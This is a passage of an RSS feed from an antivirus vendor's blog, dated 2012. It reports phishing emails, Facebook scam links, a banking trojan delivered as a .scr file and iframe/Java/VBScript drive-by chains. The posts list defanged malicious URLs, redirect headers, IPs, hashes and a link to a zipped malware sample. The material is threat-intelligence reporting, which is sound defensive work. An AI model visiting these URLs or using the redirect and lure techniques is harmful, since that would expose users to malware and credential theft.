		<link>http://blog.novirusthanks.org/2012/02/phishing-skype-incident-updating-your-information-to-the-new-security/</link>
		<comments>http://blog.novirusthanks.org/2012/02/phishing-skype-incident-updating-your-information-to-the-new-security/#comments</comments>
		<pubDate>Thu, 16 Feb 2012 14:17:15 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Phishing]]></category>
		<category><![CDATA[Security News]]></category>
		<category><![CDATA[skype phishing]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=3208</guid>
		<description><![CDATA[<p>New phishing email used to steal Skype login details: The A HREF link: Please click here to verify your identity Redirects users to the malicious URL: hxxp://login.skype.com.kad-s .com/</p><p>The post <a href="http://blog.novirusthanks.org/2012/02/phishing-skype-incident-updating-your-information-to-the-new-security/">Phishing: Skype Incident Updating Your Information To the new security</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></description>
				<content:encoded><![CDATA[<p>New phishing email used to steal Skype login details:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/02/16_02_2012-14_17_14.jpeg" alt="Phishing Email" /></p>
<p>The A HREF link:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Please click here to verify your identity</pre></td></tr></table></div>

<p>Redirects users to the malicious URL:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp://login.skype.com.kad-s .com/</pre></td></tr></table></div>

<p>The post <a href="http://blog.novirusthanks.org/2012/02/phishing-skype-incident-updating-your-information-to-the-new-security/">Phishing: Skype Incident Updating Your Information To the new security</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2012/02/phishing-skype-incident-updating-your-information-to-the-new-security/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Find out who visits your Facebook profile: it is a fake, the link redirects to malicious websites</title>
		<link>http://blog.novirusthanks.org/2012/02/find-out-who-visits-your-facebook-profile-it-is-a-fake-the-link-redirects-to-malicious-websites/</link>
		<comments>http://blog.novirusthanks.org/2012/02/find-out-who-visits-your-facebook-profile-it-is-a-fake-the-link-redirects-to-malicious-websites/#comments</comments>
		<pubDate>Tue, 14 Feb 2012 00:44:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security News]]></category>
		<category><![CDATA[facebook malicious urls]]></category>
		<category><![CDATA[facebook virus]]></category>
		<category><![CDATA[who visits your Facebook profile]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=3199</guid>
		<description><![CDATA[<p>We have noted recently various messages posted by Facebook users that promote few methods to find out who visits your Facebook profile. At the end of the message there is a link to a Bit.ly shortened URL, as you can see from this image: The shortened URL redirects the users to a malicious URL: HTTP/1.1 [...]</p><p>The post <a href="http://blog.novirusthanks.org/2012/02/find-out-who-visits-your-facebook-profile-it-is-a-fake-the-link-redirects-to-malicious-websites/">Find out who visits your Facebook profile: it is a fake, the link redirects to malicious websites</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></description>
				<content:encoded><![CDATA[<p>We have noted recently various messages posted by Facebook users that promote few methods to find out who visits your Facebook profile. At the end of the message there is a link to a Bit.ly shortened URL, as you can see from this image:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/02/14_02_2012-00_25_57.png" alt="Facebook Dangerous URL" /></p>
<p>The shortened URL redirects the users to a malicious URL:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">HTTP/1.1 301 Moved
Server: nginx
Date: Mon, 13 Feb 2012 23:18:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: _bit=4f399a30-002d0-041e9-281cf10a;domain=.bit.ly;expires=Sat Aug 11 23:18:08 2012;path=/; HttpOnly
Cache-control: private; max-age=90
Location: hxxp:// pabulums .info/nukiy.bnw
MIME-Version: 1.0
Content-Length: 122</pre></td></tr></table></div>

<p>Extracted malicious URL:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp:// pabulums .info/nukiy.bnw</pre></td></tr></table></div>

<p>Domain details:</p>
<p>The website pabulums .info is hosted at SingleHop and its current IP address is 184.154.106.126 (r90.servebyte.com). The server machine is located in &#8211; (-) and in the same server there are hosted other 1 websites. The domain is registered with the suffix INFO and the name pabulums. The organization is Servebyte.</p>
<p>URLVoid report:</p>
<p><a href="http://urlvoid.com/scan/pabulums.info">http://urlvoid.com/scan/pabulums.info</a></p>
<p>When the malicious URL is visited, there is a new redirect:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">HTTP/1.1 302 OK
Date: Mon, 13 Feb 2012 23:18:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: hxxp:// alexins .co.cc/170588/nukiy.bnw
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 786</pre></td></tr></table></div>

<p>Extracted malicious URL:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp:// alexins .co.cc/170588/nukiy.bnw</pre></td></tr></table></div>

<p>Domain details:</p>
<p>The website alexins .co.cc is hosted at SingleHop and its current IP address is 184.154.106.125 (r90.servebyte.com). The server machine is located in &#8211; (-) and in the same server there are hosted other 1 websites. The domain is registered with the suffix CO.CC and the name alexins. The organization is Servebyte.</p>
<p>URLVoid report:</p>
<p><a href="http://urlvoid.com/scan/alexins.co.cc">http://urlvoid.com/scan/alexins.co.cc</a></p>
<p>Remember to do not click in unknown URLs, posted by known and unknown Facebook users, even if they are in your friends list. Most of the Facebook virus can hijack with javascript the login session and they can automatically put &#8220;Likes&#8221; on malicious Facebook pages or they can post a message containing malicious link in your profile or in the profile of all your friends, so pay attention when you click with the mouse!</p>
<p>The post <a href="http://blog.novirusthanks.org/2012/02/find-out-who-visits-your-facebook-profile-it-is-a-fake-the-link-redirects-to-malicious-websites/">Find out who visits your Facebook profile: it is a fake, the link redirects to malicious websites</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2012/02/find-out-who-visits-your-facebook-profile-it-is-a-fake-the-link-redirects-to-malicious-websites/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Malware: Cotacao solicitada (relatorio.scr)</title>
		<link>http://blog.novirusthanks.org/2012/02/malware-cotacao-solicitada/</link>
		<comments>http://blog.novirusthanks.org/2012/02/malware-cotacao-solicitada/#comments</comments>
		<pubDate>Sun, 12 Feb 2012 14:07:39 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security News]]></category>
		<category><![CDATA[Cotacao solicitada malware]]></category>
		<category><![CDATA[relatorio1379-pdf]]></category>
		<category><![CDATA[relatorio_scr virus]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=3187</guid>
		<description><![CDATA[<p>We have received a suspicious email: Received: from unknown (HELO userb) (***@globaltires.es@177.0.120.119) Subject: Cotacao solicitada. MIME-Version: 1.0 Date: Sat, 11 Feb 2012 17:56:37 -0300 Email message is in HTML and the page source looks like: As you can see, from this code: &#60;A href=&#34;hxxp://groupnetvect .co.de&#34;&#62;relatorio1379-pdf.&#60;/A&#62; (63kb)&#60;BR&#62; The A HREF link redirects the user to an [...]</p><p>The post <a href="http://blog.novirusthanks.org/2012/02/malware-cotacao-solicitada/">Malware: Cotacao solicitada (relatorio.scr)</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></description>
				<content:encoded><![CDATA[<p>We have received a suspicious email:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Received: from unknown (HELO userb) (***@globaltires.es@177.0.120.119)
Subject: Cotacao solicitada.
MIME-Version: 1.0
Date: Sat, 11 Feb 2012 17:56:37 -0300</pre></td></tr></table></div>

<p>Email message is in HTML and the page source looks like:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/02/12_02_2012-13_49_49.jpeg" alt="HTML Page Source" /></p>
<p>As you can see, from this code:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">&lt;A href=&quot;hxxp://groupnetvect .co.de&quot;&gt;relatorio1379-pdf.&lt;/A&gt; (63kb)&lt;BR&gt;</pre></td></tr></table></div>

<p>The A HREF link redirects the user to an external (malicious) website:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp://groupnetvect .co.de</pre></td></tr></table></div>

<p>Domain details:</p>
<p>The website <b>groupnetvect .co.de</b> is hosted at Hetzner Online AG and its current IP address is 78.46.102.86 (www8.subdomain.com). The server machine is located in Germany (DE) and in the same server there are hosted other 1 websites. The domain is registered with the suffix CO.DE and the name groupnetvect. The organization is Hetzner Online AG.</p>
<p>URLVoid report:</p>
<p><a href="http://www.urlvoid.com/scan/roupnetvect.co.de">http://www.urlvoid.com/scan/roupnetvect .co.de</a></p>
<p>HTTP response:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">HTTP/1.1 302 Found
Date: Sun, 12 Feb 2012 13:01:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Location: hxxp:// consumer-electronics .junderhilltherapy .com//wp-content/themes/aurora/options-link.php
Vary: Accept-Encoding
Content-Length: 21
Content-Type: text/html; charset=iso-8859-1</pre></td></tr></table></div>

<p>The user is redirected again to another external (malicious) link:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp:// consumer-electronics .junderhilltherapy .com//wp-content/themes/aurora/options-link.php</pre></td></tr></table></div>

<p>Domain details:</p>
<p>The website <b>consumer-electronics .junderhilltherapy .com</b> is hosted at HostDime.com and its current IP address is 66.7.193.50 (west.superdomainzone.com). The server machine is located in United States (US) and in the same server there are hosted other 1 websites. The domain is registered with the suffix COM and the name junderhilltherapy. The organization is HostDime.com.</p>
<p>URLVoid report:</p>
<p><a href="http://www.urlvoid.com/scan/consumer-electronics.junderhilltherapy.com">http://www.urlvoid.com/scan/consumer-electronics .junderhilltherapy .com</a></p>
<p>HTTP response:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">HTTP/1.1 200 OK
Date: Sun, 12 Feb 2012 13:03:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Disposition: attachment; filename=&quot;relatorio.scr&quot;
Connection: close
Content-Type: application/log</pre></td></tr></table></div>

<p>Now we can see that a file &#8220;relatorio.scr&#8221; is prompted to be downloaded:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/02/12_02_2012-14_04_39.jpeg" alt="Malicious SCR File" /></p>
<p>File details:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">File: relatorio_scr
Size: 23042 bytes
MD5: BFE2E1EB1C8780149C40FAE98C353BCA
SHA1: 4C69371B15E9738FC663A381C1841315FAC030A0
SHA256: 2DF1080C551E9603F2B8F197DE62D4A643B12BF31F6D3CEE47C0649037C51CF6
SHA384: E30FBFFAD035E7F35BA62B4C6689438ED9A66C3D2F494F4896387EE89C63E445F9AA07FF0D0BF4D1C84EAE282D3F5040
SHA512: 8D9D7B7D4FBF3ACBF984B88CB027D44E98EE997915E2823D61A882B1FDD6D7DD4F5630B518D2C602649D4D42D74DAF863804924D57AC30E8B0D33161D31F706C</pre></td></tr></table></div>

<p>The file is detected by Antivirus as <font color="red">Suspect.Trojan.Generic.FD-1</font> (ClamAV), <font color="red">Trojan-Banker.Win32.VB!IK</font> (Emsisoft), <font color="red">Trojan-Banker.Win32.VB</font> (Ikarus).</p>
<p>The post <a href="http://blog.novirusthanks.org/2012/02/malware-cotacao-solicitada/">Malware: Cotacao solicitada (relatorio.scr)</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2012/02/malware-cotacao-solicitada/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New Malicious Iframe Code, Trojan.Java.Downloader and VBScript</title>
		<link>http://blog.novirusthanks.org/2012/02/new-malicious-iframe-code-trojan-java-downloader-and-vbscript/</link>
		<comments>http://blog.novirusthanks.org/2012/02/new-malicious-iframe-code-trojan-java-downloader-and-vbscript/#comments</comments>
		<pubDate>Sat, 04 Feb 2012 18:01:41 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security News]]></category>
		<category><![CDATA[boss.exe]]></category>
		<category><![CDATA[hidden iframe]]></category>
		<category><![CDATA[java exploit]]></category>
		<category><![CDATA[vbscript]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=3164</guid>
		<description><![CDATA[<p>Honeypots have reported another case of malicious iframe code that is generally added after the end of the HTML tag, at the end of the website page, as you can see from the image below: We have also noted another website that redirects users to a fake porn video streaming website with the main objective [...]</p><p>The post <a href="http://blog.novirusthanks.org/2012/02/new-malicious-iframe-code-trojan-java-downloader-and-vbscript/">New Malicious Iframe Code, Trojan.Java.Downloader and VBScript</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></description>
				<content:encoded><![CDATA[<p>Honeypots have reported another case of malicious iframe code that is generally added after the end of the HTML tag, at the end of the website page, as you can see from the image below:</p>
<p><img alt="Malicious Iframe Code" src="http://blog.novirusthanks.org/wp-content/uploads/2012/02/04_02_2012-17_44_55.jpeg" /></p>
<p>We have also noted another website that redirects users to a fake porn video streaming website with the main objective to install a VBScript (using a Java applet downloader) in the user&#8217;s system and use cmd.exe to download and execute a keylogger:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp:// habbo-sluts-exposed .tk</pre></td></tr></table></div>

<p>The URL uses an iframe code to redirect the users to another website:</p>
<p><img alt="Iframe Code" src="http://blog.novirusthanks.org/wp-content/uploads/2012/02/04_02_2012-17_54_39.jpeg" /></p>
<p>Extracted malicious URL:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp:// b0ss.getenjoyment .net/two/</pre></td></tr></table></div>

<p>And now, there is another redirect:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">&lt;meta http-equiv=&quot;refresh&quot; content=&quot;5;url=index2.html&quot; /&gt;</pre></td></tr></table></div>

<p>The user is now redirected to:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp:// b0ss.getenjoyment .net/two/index2.html</pre></td></tr></table></div>

<p>The new URL contains the malicious VBScript:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/02/04_02_2012-17_58_47.jpeg" alt="VB Script" /></p>
<p>Download the dumped malicious code (pass is novirusthanks.org):<br />
<a href="http://blog.novirusthanks.org/wp-content/uploads/2012/02/malicious_code.zip">malicious_code.zip / 1 KB</a></p>
<p>With a malicious Java file that is probably used to download the VBScript:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">File: Client.jar
Size: 2337 bytes
MD5 Hash: A6091A6335EC1FD34E8358010C044270
SHA1 Hash: 126BEED0FCE70142207DE46D58C69AADFF71645C
SHA256 Hash: 160D60C071F7A5E691C9B2537FCFA926EB9A80537D594B2E7382309E2ECD5F41
SHA384 Hash: EE4C9AC074E2B1FA5A2A28D586441008FA52FE2258DEF88AD39D4CBDA83934334FF7B4B16ABF85C44FAC565BB698B917
SHA512 Hash: EC422053D1852A1FD575485C8C8BFDF51C35347EBFED92A0A613854717EEE5933C6520936D7CE5FAA67B60A31DDC0D09F1B167EFA975D2CD9D814B51D09AB46D</pre></td></tr></table></div>

<p>Antivirus scan report:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/02/04_02_2012-18_08_25.jpeg" alt="Antivirus report" /></p>
<p>As we can see from:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/02/04_02_2012-17_59_50.jpeg" alt="Executable File Download" /></p>
<p>The script download and execute the malicious PE file located at:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp:// b0ss.getenjoyment .net/boss.exe</pre></td></tr></table></div>

<p>File details:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">File: boss.exe
Size: 1280512 bytes
MD5 Hash: C01246B6507DED92832F8A71BF1CDA2D
SHA1 Hash: 792BB694A5944B4CF70DA803586F8440C7AD1D30
SHA256 Hash: 0C3E7B048309541BE48A2F716BEFC91C90F27409B8BF0E3767F0C4CF8C8435AF
SHA384 Hash: 66EC0E377A78EB1EDCF63A26FA8C8E996D89A91CDCC034B507E1098592BB9E67C5C24F4AE9287AD421335D05311EF0A5
SHA512 Hash: ADF7AB9E2E05B788269C7B0FA46660687C868ED131162FDB29824DA54A8AC3C67F53962D43B900D8FFBC61050ADA46E53DFBA846C16461AD18E9703AA3ACEF02</pre></td></tr></table></div>

<p>Antivirus scan report:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/02/04_02_2012-18_01_44.jpeg" alt="Antivirus Report" /></p>
<p>The post <a href="http://blog.novirusthanks.org/2012/02/new-malicious-iframe-code-trojan-java-downloader-and-vbscript/">New Malicious Iframe Code, Trojan.Java.Downloader and VBScript</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2012/02/new-malicious-iframe-code-trojan-java-downloader-and-vbscript/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>JavaScript Code Hidden in Image</title>
		<link>http://blog.novirusthanks.org/2012/02/javascript-code-hidden-in-image/</link>
		<comments>http://blog.novirusthanks.org/2012/02/javascript-code-hidden-in-image/#comments</comments>
		<pubDate>Wed, 01 Feb 2012 13:28:49 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security News]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=3157</guid>
		<description><![CDATA[<p>We noted few websites infected with the following code (Gumblar-style?): Extracted malicious URL: hxxp://vohfakai .co.cc/1584179.jpg URLVoid report: http://www.urlvoid.com/scan/vohfakai.co.cc Unfortunately (fortunately) the malicious URL is not online, but I am sure it was used to spread malicious javascript code or iframe code, that would have redirected the users to an exploit kit.</p><p>The post <a href="http://blog.novirusthanks.org/2012/02/javascript-code-hidden-in-image/">JavaScript Code Hidden in Image</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></description>
				<content:encoded><![CDATA[<p>We noted few websites infected with the following code (Gumblar-style?):</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/02/01_02_2012-13_36_06.jpeg" alt="Image" title="Malicious Code" /></p>
<p>Extracted malicious URL:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp://vohfakai .co.cc/1584179.jpg</pre></td></tr></table></div>

<p>URLVoid report:</p>
<p><a href="http://www.urlvoid.com/scan/vohfakai.co.cc">http://www.urlvoid.com/scan/vohfakai.co.cc</a></p>
<p>Unfortunately (fortunately) the malicious URL is not online, but I am sure it was used to spread malicious javascript code or iframe code, that would have redirected the users to an exploit kit.</p>
<p>The post <a href="http://blog.novirusthanks.org/2012/02/javascript-code-hidden-in-image/">JavaScript Code Hidden in Image</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2012/02/javascript-code-hidden-in-image/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Iframe Alias(dot)jjbworks(dot)com Mass Infection</title>
		<link>http://blog.novirusthanks.org/2012/01/iframe-aliasdotjjbworksdotcom-mass-infection/</link>
		<comments>http://blog.novirusthanks.org/2012/01/iframe-aliasdotjjbworksdotcom-mass-infection/#comments</comments>
		<pubDate>Tue, 31 Jan 2012 14:20:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security News]]></category>
		<category><![CDATA[alias.jjbwork .com virus]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[iframe]]></category>
		<category><![CDATA[obfuscated javascript]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=3148</guid>
		<description><![CDATA[<p>Another hidden and malicious iframe is spreading by infecting websites: The iframe code is added before the BODY tag of the HTML page and is obfuscated: The extracted malicious link is: hxxp://alias .jjbworks .com/analytics.php Details about the malicious domain: Website: alias .jjbworks .com Domain Hash: 2f8f518cb5d452fca78b8c11b3a53913 IP Address: 68.68.20.114 [SCAN] IP Hostname: 68.68.20.114.customer.bluemilenetworks.com IP Country: [...]</p><p>The post <a href="http://blog.novirusthanks.org/2012/01/iframe-aliasdotjjbworksdotcom-mass-infection/">Iframe Alias(dot)jjbworks(dot)com Mass Infection</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></description>
				<content:encoded><![CDATA[<p>Another hidden and malicious iframe is spreading by infecting websites:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/01/31_01_2012-14_18_50.jpeg" alt="Image" title="Malicious Iframe" /></p>
<p>The iframe code is added before the BODY tag of the HTML page and is obfuscated:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/01/31_01_2012-14_25_03.jpeg" alt="Image" title="Obfuscated Javascript Code" /></p>
<p>The extracted malicious link is:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp://alias .jjbworks .com/analytics.php</pre></td></tr></table></div>

<p>Details about the malicious domain:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Website: alias .jjbworks .com
Domain Hash: 2f8f518cb5d452fca78b8c11b3a53913
IP Address: 68.68.20.114 [SCAN]
IP Hostname: 68.68.20.114.customer.bluemilenetworks.com
IP Country: -- (--)
AS Number: 11013
AS Name: BLUE-AS - Bluemile, Inc</pre></td></tr></table></div>

<p>URLVoid report:</p>
<p><a href="http://www.urlvoid.com/scan/alias.jjbworks.com">http://www.urlvoid.com/scan/alias.jjbworks.com</a></p>
<p>Websites infected with this malicious code:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">sosumo .net</pre></td></tr></table></div>

<p>URLVoid report:</p>
<p><a href="http://www.urlvoid.com/scan/sosumo.net">http://www.urlvoid.com/scan/sosumo.net</a></p>
<p>The post <a href="http://blog.novirusthanks.org/2012/01/iframe-aliasdotjjbworksdotcom-mass-infection/">Iframe Alias(dot)jjbworks(dot)com Mass Infection</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2012/01/iframe-aliasdotjjbworksdotcom-mass-infection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
